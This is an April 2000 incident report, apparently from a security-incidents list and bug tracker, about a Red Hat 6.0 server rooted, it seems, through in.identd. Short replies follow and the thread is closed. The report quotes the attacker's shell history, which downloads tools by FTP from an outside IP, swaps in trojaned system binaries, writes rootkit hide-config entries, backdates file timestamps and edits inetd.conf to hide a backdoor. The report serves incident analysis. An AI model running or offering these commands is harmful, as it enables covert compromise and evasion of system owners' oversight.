-----Original Message----- From: Del Elson [del.AU] Sent: Wednesday, April 19, 2000 1:02 AM To: INCIDENTS Subject: Rooted through in.identd on Red Hat 6.0 Hi, A client was hacked last week by what looked like a buffer overflow through in.identd. This was on a Red Hat 6.0 box. RH don't have any current security notices or fixes for in.identd on their servers, and I haven't seen other boxes hacked through in.identd recently. The hacker left the usual trace in /.bash_history, which ran like: mkdir /usr/lib/... ; cd /usr/lib/... ftp 200.192.58.201 21 cd /usr/lib/... mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz; mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz; mv tcpd.gz? tcpd.gz gzip -d * chmod +x * mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin; mv pt07 /usr/lib/; mv pstree /usr/bin ; /usr/lib/pt07 echo "2 sh" >> /dev/cui220 ; echo "2 slice2" >> /dev/cui220 ; echo "2 bnc" >> /dev/220 ; echo "4 6667" >> /dev/cui221 ; echo "3 15678" >> /dev/cui221 ; echo "2 pt07" >> /dev/cui220 ; echo "3 1679" >> /dev/cui221; echo "3 5454" >> /dev/cui221; touch -t 199910122110 /dev/cui220 touch -t 199910122110 /dev/cui221 touch -t 199910122110 /usr/lib/pt07 touch -t 199910122110 /usr/sbin/syslogd touch -t 199910122110 /usr/sbin/tcpd touch -t 199910122110 /bin/ps touch -t 199910122110 /bin/netstat touch -t 199910122110 /usr/bin/pstree cat /etc/inetd.conf | grep -v 15678 >> /tmp/b mv /tmp/b /etc/inetd.conf killall -HUP inetd ... installing a back door and a partial cover of tracks. The only messages in /var/log/messages around the time were: Apr 8 23:15:57 home identd[12006]: Connection from 200.192.58.201 Apr 8 23:15:57 home identd[12006]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 Apr 8 23:16:05 home identd[12007]: Connection from 200.192.58.201 Apr 8 23:16:05 home identd[12007]: from: 200.192.58.201 ( 200.192.58.201 ) for: 1176, 21 ... the IP address traces back to somewhere in Brazil. Anyone know of any current bug notices, exploits, or patches for in.identd? Del
Why do you think the exploit is in.identd? Because of the messages? /usr/sbin/inetd is a much likelier target, but I don't know of any current exploits there.
I fear some by-default inetd-enabled services e.g. in.telnetd still have a hole in them. Please see my report #10860.
Still no sign of bugs in identd (which at least now run as nobody or ident anyway)... closing.